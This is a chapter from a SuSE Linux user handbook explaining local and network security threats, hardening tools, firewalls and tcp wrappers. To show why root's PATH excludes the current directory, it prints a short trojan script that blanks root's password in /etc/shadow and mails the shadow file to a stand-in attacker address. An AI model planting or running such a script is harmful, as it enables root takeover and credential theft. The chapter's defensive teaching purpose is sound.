Part VII Security and Getting Started 411 Chapter 18 Security is a Matter of Trust 18.1 Basics Attacks and intruders from the Internet can no longer be ignored. Every day one hears of some new danger to your PC at home or the entire company network, be it from attacks from the Internet, or from viruses. But in reality it is actually quite simple to take effective precautions against such threats. Before we go into describing individual protection measures, it needs to be clarified what is actually meant by the word "security", and protection against "what". The following 6 points will quickly make it clear that the security of a computer is a very sensible aim. 1. Protection of your resources 2. Access to information 3. Data availability 4. Data integrity 5. Confidentiality of sensitive information 6. Privacy A complete security solution is necessary in order to prevent someone from taking advantage of these issues. You must not only protect your computer from outside attacks, but also against data loss from equipment failure, such as a hard drive crash or faulty backup tapes. Backing up on a truly regular basis is vital. In addition, the integrity of these backups should be checked from time to time, to make sure they are reliable. Your computer is at risk in the following ways: users connected directly to the corresponding computers present the largest of all possible risks. These are not always intentional, but specific attacks through staff, of course, cannot be ruled out. communication links via both local and worldwide networks can be scanned using sniffers and other hacker tools. Open communication links make your computer vulnerable to a break in-even from another part of the world. direct access to your computer. It can be stolen, sabotaged or damaged by someone untrustworthy. 413 18. Security is a Matter of Trust natural disasters computers are very prone to natural catastrophes. hardware and software, can be faulty, through design or concrete defects, thus not only threatening data, but also compromising security, and possibly making the service completely unusable (see also Section 91 page 418). loss of storage media. Floppy disks, streamer tapes and hard drives can be damaged, lost or stolen. electromagnetic radiation is emitted by your computer, monitor and even network cables. Sophisticated surveillance equipment can use this to monitor activity on your computer. This radiation is also carried through conduits and power cables, and, contrary to popular opinion, LCD moni- tors also give off radiation. We want to concentrate here on the first two points, because a well-thought out use of SuSE Linux can, to a large extent, remove potential dangers. The other points are probably of less interest to a private user of SuSE Linux, but if a company network is being set up, those involved need to take these points into consideration. In Section 18.1.1 and Section 18.1.2 page 417 we first point out the different types of attacks which exist. Later, in Section 18.2 page 418, we describe the relevant security tools in detail. Finally, at the end of the chapter, we outline some important general guidelines. 18.1.1 Local Security He who sits in a glass house . . . If you want to secure your data, you should begin with your personal computer. Even if your computer is not connected or only connected via dialup to the Internet, you should take certain security precautions. To have your hard drive erased accidentally by a party guest, can be a pain. Even more so if it contains the only copy of your dissertation. Passwords As Linux is a multiuser operating system, it offers not only a means for administering users but also a complete authentication mechanism. Although it may not seem necessary at first, be sure to enter a password for every user on your computer.1 This provides positive protection for your computer against intruders. You should take special care to give the user `root' a good password, because getting hold of the `root' password is one of the main targets for crackers. However, as long as others have physical access to your computer, the best password in the world is of no use. Any person who can boot your computer can attack it using a boot disk. For this reason, you should disable the floppy as a boot device in your BIOS setup. For this to be of any use, you will need to set a password for the BIOS. Do not forget this password! Without it, you will not be able to access your own BIOS ­ unless the BIOS is reset by means of a jumper setting 1 Many references discuss this. In Section 18.4 page 426, we give you some practical advice. 414 18.1. Basics If you use LILO (see Section 26 page 113) you should set the option restricted together with a password (e. g. password=secure password) in /etc/lilo.conf. Otherwise it is possible for anyone sitting directly at the computer to compromise the system's security. Obviously the password must be chosen carefully, and /etc/lilo.conf should only have read permissions for `root'. The package john in series sec (Security-related Software) contains a pro- gram which tries to "guess" passwords. A good system administrator can use this to automatically root out weak passwords, and then request users to only use safe passwords. Permissions All users should work in a reduced permissions environment in order to be sure they do not harm your system, whether deliberately or not. Furthermore, you should avoid, as far as possible, working as user `root'. And you should be the only person who knows the `root' password. Buffer Overruns Forcing buffer overruns is one of the most popular methods crackers use to get `root' permissions on a computer. Also known as "stack smashing vulnerabilities", these exploits overwrite static entries in a program's user stack (e. g., while entering text) with a value that launches a command, such as invoking a shell. This is possible in programs which have static array dimensions and which don't check for buffer overrun. The only vulnerable programs are those with the SUID bit set. These are programs that are executed using the UID of the owner instead of the user. Normally programs such as passwd use SUID because they perform tasks not allowed to a normal user. For this reason, we have taken steps to minimize the number of SUID programs in SuSE Linux as well as introducing further measures to protect these programs from attack. You should also mointor the relevant media and, when such loopholes are announced, you should obtain the available updates and patches as soon as possible. Another form of attack on privileged programs and running services are so- called "link attacks". Through programs working carelessly in public direc- tories, it can be possible to divert data to totally different files, thus compro- mising the security of the system, or even bringing it down. In order to reduce the number of SUID and SGID files in the system, in SuSE Linux, you can, with YaST, in System Administration and Security Settings change the settings to secure or paranoid in the selection window file permissions changed to:. The permis- sions set by these can be seen in the files /etc/permissions.secure and /etc/permissions.paranoid. Before you use paranoid, how- ever, you should ensure that the functionality of the system is not too re- stricted for your own requirements. Because of its complexity and its huge amount of code, the X Window System (XFree86) has, on a number of oc- casions, attracted adverse attention. This problem has now been diffused in SuSE Linux because the server and libraries are no longer set with SUID 415 18. Security is a Matter of Trust `root'. Under certain conditions, however, there can be a number of draw- backs in the client-server communication. It is possible, for example, to in- tercept keyboard input, or to read window contents. By observing rule 3 and using Xauthority (command xauth), as well as avoiding xhost +, a high level of security can be achieved. Where possible, to start remote X-programs, package ssh in series n (Net- work) should be used. If you plan to use ssh commercially, please look at the licenses in /usr/doc/packages/ssh/COPYING. ssh is available for almost any platform. However, this so-called X11 forwarding also contains its own concealed risks, so you should consider not using it al all. For reasons of performance alone, the X Window System should never be installed on critical servers (i.e. file servers, ftp servers, routers, etc. . Viruses and Trojan Horses Until relatively recently, various types of viruses did their mischievous deeds, and not just on home computers, because copying and transporting software by floppy disks represented the ideal feeding ground for such programs. For- tunately, only two viruses for Linux have been discovered until now. Because software for Linux is hardly ever passed on in binary form, and since SuSE Linux itself can be considered virus free, there is no threat from viruses, pro- viding you abide by rule 1, on page 426. It is a different matter, however, for the still increasingly seen macro viruses, often sent by electronic mail (embedded in word processing documents). Since there is no Linux version of Microsoft Office, these can do no dam- age to SuSE Linux itself. The fact that SuSE Linux is increasingly used on mail servers as a "Mail Transfer Agent", offers an ideal opportunity to scan incoming and outgoing mails automatically for embedded viruses. "Trojan horses" are completely different from viruses. These are programs which claim to do one thing, but do some evil deed as well. For example, a shell login Trojan horse might collect user names and passwords in a file, and send this information on as e-mail. This may sound quite harmless, but it's no joke if credit card numbers or the PIN of a bank account is involved. The chances of loading a Trojan horse from the Internet or receiving one by e-mail are pretty slim. It is, however, standard practice to leave behind some Trojans on an already compromised system, in order to be able to access that machine at any time. The existence of these can therefore be seen as a sure sign of a compromised machine. While there is no definitive protection against viruses and Trojan horses, you can greatly reduce the likelihood of such attacks by installing a good virus scanner, and copying both floppy disks and programs with great care. In addition, please see Section 18.4 page 426. The use of programs such as tripwire, package tripwire, series sec (Security relevant software), see Section 92 page 419 is useful in identifying these. 416 18.1. Basics 18.1.2 Network Security Most computers these days no longer exist on their own ("standalone"). As Linux offers all the necessary capabilities, most Linux computers are on a LAN and may just as easily be connected to the Internet via a modem. Linux computers are also frequently used as gateways for complex subnets. These factors provide many avenues of attack from the network. You may avoid most of these attacks by setting up a firewall. The ports in use will still be vulnerable, but they may be protected, using the appropriate tools. The potential for being attacked during the 30 minutes each day you read your e-mail while connected to the Internet via dialup modem may be neglected. Systems which use leased lines, however, should be protected. Below, we describe the most important forms of attack. Man in the Middle "Man in the middle" attacks refer to a network that is routed via one or more hosts. The intruder takes control of one of the routers, and can sniff IP packets, redirect and replace them. As routers currently do not require authentication, it is quite easy to do this. This will change when the new IPv6 protocol standard comes into force. The only protection against this kind of attack is a good set of cryptographic tools. These attacks occur mainly while accessing WWW sites or while exchanging mail. You should never use commands such as telnet and rsh, as they send an un-encrypted password over the network. This allows devious hackers to read them! Switch to ssh to avoid this. E-mail can be encoded, using pgp. Even HTTP pages can be encoded, using the SSL2 protocol. This protocol is used with package apache in series n (Network). The quality of the encryption is only as good as the secure transmission of the key. So you should take special care when doing this! Buffer Overflows, Part 2 After so-called "sniffing", the passive reading of data (such as login and pass- word), buffer overflows are the most frequent kind of security compromise from the outside. The rule here is: every service accessible externally (e. g. mail, webserver, POP3, etc.) represents a potential security problem. all services which are absolutely essential and cannot be switched off, should, wherever possible, only be accessible by certain systems, via a firewall con- figuration of the Linux kernel (by means of ipchains). If this is not pos- sible you should try and replace the service with an especially secure version (e. g. package postfix instead of package sendmail). In addition to this, experts can run every service in its own chroot environment. 2 SSL stands for Secure Socket Layer 417 18. Security is a Matter of Trust Denial of Service Denial of service attacks attempt to overload a network service. Under cer- tain conditions, not only the specific service attacked but the computer under attack as well, may no longer be reached. After the attack, the network pack- age which initiated it will often have been moved somewhere else. Denial of service is often used together with IP spoofing (see below) to conceal the source of the attack. Tracing the attacker is almost impossible. You need an effective means of protection. When denial of service attacks are discovered, a patch protecting against it will usually be available for download over the Internet within hours. SuSE Linux has been patched to protect against every denial of service attack known, up to the time of pressing the CD. The administrator must remain informed at all times about both attacks and available patches. IP spoofing IP spoofing makes use of a security hole in the TCP/IP protocol-it doesn't check the return address. Thus, this address may be changed to cover the cracker's origin of attack. It is important to configure your router to require an external network con- nection. Only packets containing an external address should be routed to the internal network, and packets with an internal address, to the external net- work. It should be the responsibility of each ISP to configure their routers properly so that invalid packets will not be routed. 18.2 Tools Let's take a look at the tools available for maintaining your system and check- ing for potential weak points. We would like to remind you at this point that the potential threat to a computer varies in each individual case. In a network protected by a firewall, it is clear that less protection and monitoring measures are needed than in an unprotected network. 18.2.1 Local Tools Two great advantages of Linux over other operating systems are it's stability and the fact that it is a multiuser system. However, the latter entails risks which should not be underestimated. In addition to the known permissions, there are certain parameters which can be exploited by the advanced user. Specifically, we mean the SUID bit. A program with this set automatically has the permissions of the user to whom it belongs. If the said program belongs to the superuser, and is started by any user, then it has the rights of the superuser on the running system. This might sound dangerous but this is normally not the case. In fact there are several programs that rely on this capability. The command ping, for example, needs to be executed as superuser. This would mean that only user `root' would be allowed to execute this program. To avoid this, the SUID bit is set. newbie@earth:/home/newbie > ls -l /bin/ping 418 18.2. Tools -rwsr-xr-x 1 root root 13216 Mar 17 16:36 /bin/ping If you would like to know the programs that have the SUID bit set and belong to user `root', enter the following command: newbie@earth:/home/newbie > find / -uid 0 -perm +4000 This is one way of detecting "suspicious" programs. YaST enables you to set `Permissions will be set to:' (in `System administra- tion' and `Security settings') secure. The files which are af- fected by this can be seen in /etc/permissions.secure. No one has the time to monitor his computer all the time. Fortunately there are tools to help you perform this tedious task. One of these tools deserves special mention, recommended as it is by CERT.3 This is the tripwire package in package tripwire, series n (Network). Tripwire Tripwire is easy to understand. It checks the system and saves the states and necessary information in a database. You can specify the files which are to be checked in a configuration file. Tripwire doesn't check for infected files or system errors. It assumes that it is installed on a clean system. This is why it should be installed directly after the system has been set up and before it is connected to the network. You create the database as follows: root@earth:root > /var/adm/tripwire/bin/tripwire -init The paths to the database and configuration files, as they have been compiled into package tripwire on SuSE Linux are shown in Table 18.1. /var/adm/tripwire Database and configuration file Table 18.1: Tripwire The paths are chosen such that only the superuser (`root') may change to the Tripwire home directory. Ideally the database should be on a read- only filesystem (e. g., a write protected floppy disk), otherwise a successful attacker could cover his tracks by manipulating the database. An example configuration file for Tripwire may be found in /usr/doc/packages/ tripwire/tw.conf.example.linux. Help on the syntax of Tripwire may be found in the corresponding manpage tw.config. You may apply different checksum methods to different files and directories. After you have 3 CERT = Computer Emergency Response Team; see http://www.cert.dfn.de/ dfncert/info.html. 419 18. Security is a Matter of Trust set up your configuration file, you may run tripwire regularly, for example, as a cron job. SuSE Security Tools SuSE Linux now has four specially developed security programs to help you make your system more secure, and help you in controlling this: The package firewall, series sec (Security-related Software) contains the script/usr/sbin/SuSEfirewall, which reads out the configuration file /etc/rc.firewall and then generates restrictive filter lists by means of the program ipchains. More information can be found in Section 18.2.2 on the facing page, Network Tools. The package secchk, series sec (Security-related Software) contains a number of small scripts which make special safety checks on the system on a daily, weekly and monthly basis (such as the consistency of the password file, user files, breaking passwords, modules which are running), and if changes have been made, the administrator is informed. The package hardsuse, series sec (Security-related Software) contains the perl script /usr/sbin/harden suse, which was developed to provide system administrators with a simple-to-use program to increase security. When it is started, nine yes/no questions are asked (for example, should all services should be de-activated user security increased, or SUID and SGID files mini- mized?), and according to the answers given, the system is then re-configured. You can find a log file with the changes in /etc/harden_suse.log, and backup copies of the modified files are also created. If the system subse- quently does not perform as expected, the changes can be undone, using the script /etc/security/undo harden suse.pl. The package scslog, series sec (Security related software) contains a ker- nel module which, when it has been loaded, (you can automate this by adding it to the startup files, for example) will protocol all incoming and outgoing network connections. The package secumod, series sec (Security related software) contains a further module which prevents, or makes it difficult, for attacks to be made on your system. Up until now, this includes protection from symlink, hard link and pipe attacks, processes can, if desired, be stopped from being "strace" d, and more besides. Because this package is still very new and was not completely documented at the time of the handbook going to press, we would like to ask you to have a look at the documentation of the package. Further tools are already being prepared. Surfing the Log Files The log files are a very important resource for gathering information about your system. These are files where programs leave a record of their work. At least one of them, /var/log/messages, should be checked regularly. Most of the logs in SuSE Linux are configured to write to this file. Normally you don't have the time to browse this huge file. Luckily there are tools which make it easier to read these log files. One of these is the program 420 18.2. Tools logsurfer, which continually checks log files according to directions in a con- figuration file. You may attach commands to certain occurrences in the log files. For example, if the word "fail" occurs, you may want to be informed via e-mail. logsurfer is a way to do this. logsurfer comes with an excellent man- page, see manpage for logsurfer.conf (man 4 logsurfer.conf). The PATH Variable and User `Root'... You may have noticed while working with SuSE Linux that the current direc- tory is excluded from the search path of `root'. This is why when you are `root', you have to add the prefix ./ to launch commands from the current directory. The reason that SuSE Linux is configured this way is illustrated in the example below: * Suppose there is a user working on your system who creates the script in File contents 18.2.1. #!/bin/sh cat /etc/shadow | \ sed 's;\( root:\)[ :]*\(:.*\);\1\2;' > /etc/shadow mailx hacker@@hackit.org -s "Root Account hacked" < /etc/shadow ls $* File contents 18.2.1: Shell script to hack root account * This script is then moved to /tmp/ls. * Now, if `root' changes to /tmp, even though he has the actual path in his PATH environment variable, `root' will not launch /bin/ls, but our little script in /tmp/ls instead. The result of executing this script is that the `root' password is removed. Even worse, the script also sends the user who wrote it an e-mail, informing him that the password has been removed. Now, he may freely log in as user `root'. The consequences may be very unpleasant ;-) . If this current directory was not in the search path, this could only have happened if you had explicitly typed ./ls. This, by the way, is an example of a Trojan horse, as described above (see Section 90 page 416). 18.2.2 Networking Tools It is instructive to observe a host that is connected to a network. Below, we want to point out how you can protect your Linux computer from attacks through the network. inetd An elementary approach to this is a carefully thought out switching of the ports which inetd (Internet "Super Server" ) makes available. In SuSE Linux, 421 18. Security is a Matter of Trust some of the "vulnerable" services are normally disabled by default. These include the so-called "internal services" of inetd. The configuration file is /etc/inetd.conf. But other services as well should be enabled or dis- abled with care ­ according to requirements. We recommend that you take a look at the configuration files, since, for example, POP3 and other services are enabled by default! A list of services that are completely sufficient for nearly all cases is shown in File contents 18.2.2. ftp stream tcp nowait root /usr/sbin/tcpd wu.ftpd -a telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd shell stream tcp nowait root /usr/sbin/tcpd in.rshd -L login stream tcp nowait root /usr/sbin/tcpd in.rlogind finger stream tcp nowait nobody /usr/sbin/tcpd in.fingerd -w ident stream tcp wait nobody /usr/sbin/in.identd in.identd \ -w -e -t120 File contents 18.2.2: Example configuration for inetd Think hard about whether you really need services such as telnet, shell and login. The disadvantage of each of these services is that passwords are tran- mitted without encryption. Reading these passwords is not difficult. There are tools which make this kind of attack trivially easy. Never, under any circumstances, allow remote `root' access! Once again, we direct your attention to the "Secure Shell" (package ssh). It encrypts everything, even the password. ( Encryption). Questions on the SuSE Packet Filter Firewall cannot be answered by in- stallation support. The SuSE Packet Filter Firewall (package firewall, series sec (Security- related Software)) is activated and configured by the file /etc/rc. firewall. Individual entries are documented and commented in the file itself. In order to help first-time users as well into the intricacies of firewalls, here are some basic explanations and hints on using the SuSE Packet Filter Firewall. The family of protocols used for communication via the Internet is the In- ternet protocol known as "TCP/IP". TCP/IP stands for Transmission Control Protocol and Internet Protocol. TCP/IP is nowadays available on almost all hardware, operating systems and network platforms. It was developed by the United States Department of Defence (DoD) and presented to the public for the first time in 1978. A TCP/IP network transforms data between computer systems by turning the data into packets, and sending these packets. Each packet begins with a header containing various control information, such as the address of the target computer. This header is then followed by the data to be transmitted. If, for example, a file is to be transported to another computer via the network, the contents of this file are transformed into a series of packets. These packets are then sent to the target computer. 422 18.2. Tools The error-free transmission of the packets is guaranteed by the Transmission Control Protocol (TCP). It ensures that the packets arrive in the right order. TCP provides the transport layer and announces errors which cannot be cor- rected to the next-higher IP layer. A further transport protocol of the family is UDP. With UDP, there is no guarantee of error-free transmission, making transmission faster than with TCP. This means, however, that when using UDP you must check in other ways (through the application) that transmis- sion errors are detected and corrected. An IP address (IP version 4) is a 32-bit value. To make IP addresses more readable they are written in 8-bit portions, separated by dots (e. g.192.168.0.20). In order for a computer to maintain a number of connections simultaneously, and for it to be able to keep these connections separate from each other, the communication takes place via so-called ports (0 to 65535). Different connections are assigned to these ports, that is, in the header of a TCP or UDP packet the source and target ports of the sending computer (source address) and the receiving computer (target address) are entered, together with the addresses of the computers themselves. A number of the ports from 0 to 65535 are reserved for specific services (see also /etc/services). The TCP port 23 is, for instance, the port for telnet connections. A further specification concerns ports 0 to 1023 (TCP and UDP). They are the so-called privileged ports. Only trustworthy programs, which sometimes need to be carried out with system administrator privileges, can offer their services on these ports (see /etc/services). the ports 1024 to 65535 are referred to as non-privileged ports. The diference can be illustrated with the somewhat simplified example of a file transfer with ftp. An FTP server provides its services on TCP port 21. If an FTP client on the computer is started with the IP address 192.168.3.5 (client) with the command newbie@earth:/home/newbie > ftp 192.168.3.16 then the client creates a TCP connection to port 21 of the computer with the IP address 192.168.3.16 (Server). On port 21 the FTP server answers and processes the user identification (login name and password query). The FTP commands which the user enters after logging in are also transmitted via this connection. If data is to be transferred from the server to the client, (after entering the command ls or get) the server independently creates a connection to a non-privileged port of the client. The actual data is then transmitted via this connection. TCP/IP was designed for very large networks, and for this reason contains mechanisms for structuring a network. The entire 32-bit wide address space can be divided into "subnets". A subnet is formed by a number of bits being defined (beginning from the left) as the net address of a subnet. For the subnet with the address 192.168.3.0, the first 24-bits of the address form the network address. Through the "subnetmask" (network mask) it is defined how many bits of an address form the network address. The subnetmask 255.255.255.0 for example, specifies that the computer with the address 192.168.3.5 can be found in the subnet with the address 192.168.3.0. Subnets within a large network are usually connected by routers. Routers are either specialised machines or computers which are sufficiently well 423 18. Security is a Matter of Trust equipped, and which ensure that packets find the correct path to their destina- tion. The counteracting role to the subnet mask is performed by the so-called broadcast address. Via the broadcast address, all computers of a subnet are reachable. Example: all computers in the network 192.168.3.0 can be reached via the broadcast address 192.168.3.255. If a connection to the Internet has been made then the computer is part of the worldwide Internet. Each time a connection to the provider is activated, that computer is reachable from the Internet. Now you need to take steps to prevent unauthorized access from the Internet. This task is taken on by the SuSE Packet Filter Firewall. Packet filters are network level firewalls. They make fundamental deci- sions on the basis of source addresses, target addresses and ports in spe- cific IP packets. A simple router or the SuSE Packet Filter Firewall are traditional network level firewalls. Since they are not intelligent enough to determine what significance the contents of an IP packet have and where it really originates from, they do not offer sufficient protection against attacks. Modern network level firewalls (for example, SINUS Firewall I for Linux, http://www.sinus-firewall.org) are more highly developed, and gather internal information on the status of connections which run via them, the contents of data streams, etc. Application level firewalls (e. g.TIS Firewall Toolkit) on the other hand, are usually comput- ers on which proxy servers run and which carefully protocol and examine the data traffic running over them. Since the proxy servers are programs which run on the firewall, they are ideally suited for protocol and access protection mechanisms. Where should the SuSE Packet Filter Firewall be used? For networks with an increased need for protection (strictly speaking, anywhere where personal information is stored), application level firewalls are still the first port of call, due to the way they function. For such networks the SuSE Packet Filter Firewall does not provide sufficient protection. The SuSE Packet Filter Firewall is intended for protecting a private PC, a mini-network at home or a workstation within a trusted network. You should only use the SuSE Packet Filter Firewall to protect company networks if you know exactly what you are doing (see bibliography). To set up and maintain firewalls, an in-depth knowledge of networks and the protocols used in them is essential. This knowledge ultimately cannot be replaced by a graphical interface or a pre-configured setup, such as that provided by the SuSE Packet Filter Firewall. Documentation on the SuSE Packet Filter Firewall can be found in /usr/ doc/packages/firewall and /etc/rc.firewall. If you want to tackle the subject of firewalls in more depth, we recommend you experimenting and studying the following sources: The Firewall handbook for Linux 2.0 and 2.2 by Guido Stepken provides almost everything you need to know in order to construct a secure firewall with Linux, from detailed technical information to the description of typical 424 18.3. Security in SuSE Linux weak points and errors. The firewall handbook is required reading, and is only available online (http://www.little-idiot.de/firewall/). The Freefire project is a good starting point for all those who are interested in firewalls on a free software basis (http://sites.inka.de/sites/ lina/freefire-l/). TCP Wrappers TCP wrappers (tcpd) enable you to securely use certain services for networks or IP addresses. tcpd is activated in SuSE Linux by default. You may see this in column six of File contents 18.2.2 page 422 and /etc/inetd.conf. The concept is quite simple: tcpd launches the services that you actually need, first checking to see if the client is authorized to access them. This access control takes place via the two files /etc/hosts.allow and /etc/hosts.deny. * Access is granted if a combination of client and service is found in the file /etc/hosts.allow. * Similarly, access is denied if such a combination is found in the file /etc/hosts.deny. * If there is no rule in one of the above files, access is allowed. The first rule to be found is used. If access to, for example, the telnet port in /etc/hosts.allow is allowed, it will be allowed even if it is denied in /etc/hosts.deny. The syntax for making entries to these files is described in the manpage for hosts access (man 5 hosts access). There is an alternative to TCP wrappers called xinetd, which combines the features of inetd and tcpd. One disadvantage of xinetd is that the configura- tion files of inetd and xinetd are incompatible. Only one Internet "Super Server" (inetd or xinetd) may be started. You have to decide which one to use. In the series sec (Security-related Software) further programs can be found which can be of help in building a secure system. Just browse through the packages there. 18.3 Security in SuSE Linux SuSE offers the following services to accomplish the highest possible security-oriented distribution: Two Mailing Lists are Available for Everyone: * suse-security-announce ­ contains SuSE notifications of secu- rity problems. * suse-security ­ contains notifications and is open to public discus- sion. 425 18. Security is a Matter of Trust To subscribe to either of the mailing lists, just send an electronic mail to majordomo@suse.com, with the contents: subscribe suse-security or subscribe suse-security-announce Central Notification of New Security Problems: If you find a new security problem (be sure to check the updates available beforehand), please send an electronic mail to: security@suse.de, with a description of the problem. We will attend to it immediately. You can encrypt the files with the package pgp. Our public pgp key4 can be downloaded from: http://www.suse.de/security ( encryption). 18.4 General Rules 1. Only use `root' for administrative purposes. You should create a user for your daily work. 2. Try to avoid the commands telnet, rlogin and rsh. 3. Use ssh instead, if you want to work remotely. 4. Deactivate all network services that are not needed. 5. Make sure you have up-to-date versions of relevant packages such as bind, sendmail and ssh. 6. Remove SUID and SGID bits from all files in the system that are not essential for normal users to work with. 7. Check your log files regularly. 4 PGP Key fingerprint = 73 5F 2E 99 DF DB 94 C4 8F 5A A3 AE AF 22 F2 D5 426